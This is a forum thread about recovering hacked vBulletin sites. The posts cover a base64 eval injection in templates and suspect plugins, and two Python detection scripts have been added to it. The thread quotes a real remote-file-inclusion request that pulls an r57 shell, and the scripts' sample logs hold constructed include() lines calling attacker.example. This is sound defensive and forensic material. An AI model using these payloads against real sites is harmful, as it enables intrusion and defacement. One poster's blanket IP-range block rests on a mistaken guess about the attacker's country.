vbulletin hacked
I was recently called in to recover a friend's vBulletin after it was hacked by ViRuS_HiMa, a well known and fairly experienced hacker at turk-h.org. Since cPanel logging was not enabled, I do not know how he entered the site, but his technique was rewriting the spacer_open template in all styles with an eval(base64). I would like very much to decode the eval(base64) so I can see if it's simple HTML or if there are additional executions being made that I need to be aware of. If anyone can assist with the decoding, please contact me. Again, I do not know the point of entry (probably a mod). If anyone else has their forum hacked by ViRuS_HiMa, and it seems that no matter what you try, it always shows the defacement, check your spacer_open templates in the database for eval(base64) encrypted text. Thanks
What is the URL to your friend's board?
I sent it via pm since the site exploit has not yet been found.
I don't see anything obvious at this time on the site.
This could have been done in many different ways: vulnerable modification, access to the database, etc.
It happened again. The site uses all non-beta mods, only two people have access to the database, and no mods that are known to be vulnerable. I believe it was the MySmilies mod, but I have no proof.
Make a database backup, clean everything off your server.
Set everything up again, run your database through ImpEx to ensure no extra tables or permissions or anything have been added, and re-upload vBulletin. That will ensure no files have been left behind from the hacker.
I'm still going through logs but all I can find right now is as follows:
Code:
82.201.250.97 - - [15/Aug/2008:14:28:23 -0600] "GET /clientscript/vbulletin_important.css?v=372 HTTP/1.1" 200 2077 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
I also found a vbulletin_textedit.js file within the PhotoPlog images directory. Still looking into that one.
Can you list the hacks you have installed, please?
Auto Move Closed Threads 1.1.1
Automatically Added Friend 1.0.1
Casino .92
Cyb - Advanced Forum Statistics 5.8.1
Cyb - PayPal Donate 4.7
Friends "Facebook style" 1.0.0
Gifts System 0.6
GTPrivate Message Quickreply 3.7.0.1
GTUserCP - Enhanced USERCP Interface + USERCP Menu 3.7
gXboxLive 2.1.9
HS - Signature of the Week 1.0.0
ibProArcade for vBulletin 2.6.7
Inactive User Reminder Emails 1.1.3
Members who have Visited 3.7.003
Miserable Users 3.7.002
Mobile Device Detection 1.0.0
Multiple Login Detector 1.03
MySmilies VB 3.7.004
passiveVid 1.1.2
PhotoPlog Pro 2.1.4.8
Report Bad PM 1.0.5
Separate Sticky and Normal Threads 2.0.0
SocialForums 1.4.2
TCattd - The Image Resizer 1.2.6
Usergroup Color Bar 1.0.0
vBadvanced Links Directory 3.0 RC1
vBCredits 1.4
vBCredits with ibProArcade 1.2
vBSEO 3.2.0
vBSEO :: Sitemap Generator 2.2
Welcome Headers 5.0.2
One of my forums was hacked not long ago, and these are the hacks we both have.
Don't know if this helps us:
ibProArcade for vBulletin 2.6.7
Inactive User Reminder Emails 1.1.3
Miserable Users 3.7.002
vBSEO 3.2.0
vBSEO :: Sitemap Generator 2.2
Please check if you have set chmod to 777 on any of your directories in public_html. If you have, then it can easily be hacked, e.g. defaced by uploading some PHP file. After changing the chmod, check: there must be some file with a strange name; delete it.
I did find the mysmiliesvb folder with 0777 permissions. The readme in the mod says it is required.
The user albums were moved into the file system and although the main folder is 0755, every sub-folder vBulletin creates is set to 0777. I found a 1x1 pixel image in the avatars folder but I cannot seem to locate it within File Manager.
Side note, dude: my website & DB were hacked a while back, maybe a year & 1/2 ago. I got in touch with my hosting company, who checked the logs, and it ended up being FlashChat w/ vB integration that they used to get in.... So if you are using systems outside vB that are integrated into it... be advised of those as well; FlashChat is what got my site hacked.
All directories must be CHMOD 755 or higher security (meaning lower than 755, e.g. 750, 644, etc.).
You cannot set CHMOD 777 on any files or directories because this makes the files world WRITABLE, which is insecure, so if any mod requires you to set 0777 I recommend not using it. Have you lost any database of your site?
Happened again, this time different person.
Have you followed all the steps outlined in this article?
How To Make My Forums More Secure
Such a pain. Thankfully they only changed the index. I changed passwords and such. As for the list provided, I did most.
Thanks for all your suggestions; we're still looking for the exploit.
The latest hacker placed text within the inlinemodform just above the threadlist table: http://thebestforumever.com/front-desk/ They have also been doing index page defacing. I suppose we'll simply have to backtrack and begin disabling plugins until it can be located.
Maybe the problem was this: http://www.vbulletin.com/forum/showthread.php?t=282133
You wouldn't happen to have HTML enabled anywhere?
I did find this in the log.. anyone?
GET /index.php?vb=include('http://meto5757.by.ru/shells/r57.txt');
Upon further research, they tried multiple file exploits, finally ending in faq.php, which got a c100.php file uploaded to root. I didn't post the shell I found, but I sent it to Marco via PM.
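The request line quoted above is a remote-file-inclusion probe: the address of a remote script handed to a PHP parameter. As an added example (not the thread's or vBulletin's code), this Python script parses Apache combined-format access-log lines like the one posted earlier in the thread and flags requests whose query values carry a remote URL or include()/require() source; the sample lines are constructed, using RFC 5737 placeholder IPs and the hostname attacker.example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" access-log line, the format of the log excerpt quoted earlier in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Query values typical of remote-file-inclusion probing: a remote URL handed to a
# script parameter, or PHP source such as include('...') dropped into the query string.
RFI_VALUE_RE = re.compile(r"^(?:https?|ftp)://|\b(?:include|require)(?:_once)?\s*\(", re.I)

def classify_request(target):
    """Return (param, decoded_value) for the first suspicious query parameter, else None."""
    for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; a second pass catches double-encoding
        if RFI_VALUE_RE.search(decoded):
            return param, decoded
    return None

def scan_access_log(lines):
    """Return one finding per request whose query string looks like an RFI attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hit = classify_request(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "time": m.group("time"),
                             "path": urlsplit(m.group("target")).path,
                             "param": hit[0], "value": hit[1], "status": int(m.group("status"))})
    return findings

# Constructed sample log (RFC 5737 placeholder IPs, attacker.example hostname), modelled on
# the include() request quoted above and the faq.php attempt it mentions, plus two benign hits.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Aug/2008:14:28:23 -0600] "GET /clientscript/vbulletin_important.css?v=372 HTTP/1.1" 200 2077 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Aug/2008:14:31:07 -0600] "GET /index.php?vb=include(\'http://attacker.example/shells/r57.txt\'); HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [15/Aug/2008:14:32:40 -0600] "GET /faq.php?page=http%3A%2F%2Fattacker.example%2Fc100.txt%3F HTTP/1.1" 200 4096 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [15/Aug/2008:14:33:01 -0600] "GET /showthread.php?t=12345 HTTP/1.1" 200 30211 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['path']} {f['param']}={f['value']!r} -> {f['status']}")
```

A 200 status on such a request does not prove the inclusion worked, but it marks the script and parameter worth auditing first, and the source IP worth correlating with later uploads.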
My forum got hacked as well.. by virusman... my forum URL: http://www.hyipsensor.net/board
Please check whether it is the same problem as stated in this thread..
Yes, same problem.
It appears that there is a backdoor on the BlueHost server. I have seen many queries to search engines for that specific shared IP address. It's either in your spacer_open templates or your index.php was rewritten. Also look for a c100.php file in your forum root. You can contact me if you need assistance. EDIT: I just checked other files in your board and it appears that the template hack was executed. Look for some weird code in your spacer_open(s).
From what I remember from when I used to follow some exploits that occurred on a notorious site for logging site defacements, usually groups don't just hack the individual website but actually obtain rights over entire servers (this was because there was a score system for how many defacements the groups obtained). They would exploit code that host providers have installed on their systems, which doesn't affect just one website but potentially their whole clientèle base.
If you can't find fault in your software or mods (if it's server side then they would rewrite the indexes as a BATCH), I would seriously suggest informing your host, or enquiring at the very least whether they are having problems.
Seeing a trend here. I got hit last night and mine was a bit different, as they seemed to get FTP access and ran a script that started adding porn links in all the files on the server. I have full off-server backups but it still took about 4-5 hours to delete everything off there and go to a backup.
My issue may be unrelated or it may be related... I do know it was a bot that hit my site, as they changed hundreds of files in about 20 minutes. I have copies of the code they inserted as well (darned porn links).
It took some time but I figured out my hacker came from IP: 84.121.141.217
Thanks. 84.0.0.0-84.255.255.255 added to my cPanel IP Deny Manager. I don't expect any legit visitors from NL, so I can get away with that!
Your "hacker" has used an IP address that is assigned to a Spanish ISP. So he is just one of the customers of this ISP. He is not located in the Netherlands.
PS: RIPE is the European registrar and its headquarters are located in the Netherlands; this has got nothing to do with your hacker.
Thanks for the clarification. I'm not expecting anyone legit from Spain either, so I'm still safe denying the whole range.
Any updates on this vulnerability? I had a site hacked twice exactly the same way (base64 encrypted PHP code was inserted at table 'template', field 'template', key record 'spacer_open', which was evaluated and defaced the website). My vBulletin version is 3.7.3 PL1. Modules used (all latest available version):
It seems that the only module installed in common with bilderback's configuration is "Separate Sticky and Normal Threads".
I still haven't found how attackers managed to rewrite the spacer_open template in all styles with an eval(base64) function... Anyone with the same problem?
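Both the first post and this recap describe the same artefact: eval(base64_decode(...)) text written into the spacer_open row of the vBulletin `template` table. The Python scanner below is an added example, not code from the thread or from vBulletin: it flags template rows carrying that pattern and decodes the payload for review without evaluating it, going one step beyond the thread by also unwrapping the common gzinflate() variant. The styleid/title column names are assumed from vBulletin 3's schema, and the sample rows and payloads are constructed.

```python
import base64
import re
import zlib

# The injection described in the thread: eval(base64_decode('...')) inside a template body.
# The optional gzinflate() wrapper is a common variant the thread does not mention.
INJECT_RE = re.compile(
    r"eval\s*\(\s*(?P<gz>gzinflate\s*\(\s*)?base64_decode\s*\(\s*"
    r"['\"](?P<b64>[A-Za-z0-9+/=\s]+)['\"]",
    re.IGNORECASE,
)

def decode_payload(b64, gz=False):
    """Decode the base64 (and optional raw-DEFLATE) payload to text for review; never eval it."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64))
    if gz:
        raw = zlib.decompress(raw, -15)  # PHP gzinflate() == raw DEFLATE, no zlib header
    return raw.decode("utf-8", errors="replace")

def scan_templates(rows):
    """rows: dicts with styleid, title, template (column names assumed from vB3's
    `template` table). Returns one finding per injected template, in row order."""
    findings = []
    for row in rows:
        for m in INJECT_RE.finditer(row["template"]):
            findings.append({
                "styleid": row["styleid"],
                "title": row["title"],
                "decoded": decode_payload(m.group("b64"), gz=bool(m.group("gz"))),
            })
    return findings

# Constructed sample rows: clean templates plus two injected spacer_open copies
# (plain base64 and gzinflate-wrapped). The wrapping around eval() is simplified.
_PLAIN = base64.b64encode(b'<?php echo "site defaced"; ?>').decode()
_GZ = base64.b64encode(zlib.compress(b'<a href="http://attacker.example/">hidden link</a>')[2:-4]).decode()
SAMPLE_ROWS = [
    {"styleid": 1, "title": "spacer_open", "template": "<div>$spacer</div>"},
    {"styleid": 2, "title": "spacer_open",
     "template": "<div>$spacer</div>eval(base64_decode('" + _PLAIN + "'));"},
    {"styleid": 2, "title": "header", "template": "<div id=\"header\">$header</div>"},
    {"styleid": 3, "title": "spacer_open",
     "template": "eval(gzinflate(base64_decode(\"" + _GZ + "\")));<div>$spacer</div>"},
]

if __name__ == "__main__":
    for f in scan_templates(SAMPLE_ROWS):
        print(f"style {f['styleid']} / {f['title']}: {f['decoded']}")
```

Point it at a dump of the `template` table; the script only reports, and restoring a clean spacer_open in every affected style is still a manual step.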
In our case, there was a PHP shell script already planted somewhere on the BlueHost shared server.
Amazingly, and rarely, the hacker actually communicated in the forum for some time. http://thebestforumever.com/archives...c-ur-site.html
Powered by vBulletin® Version 3.8.12 by vBS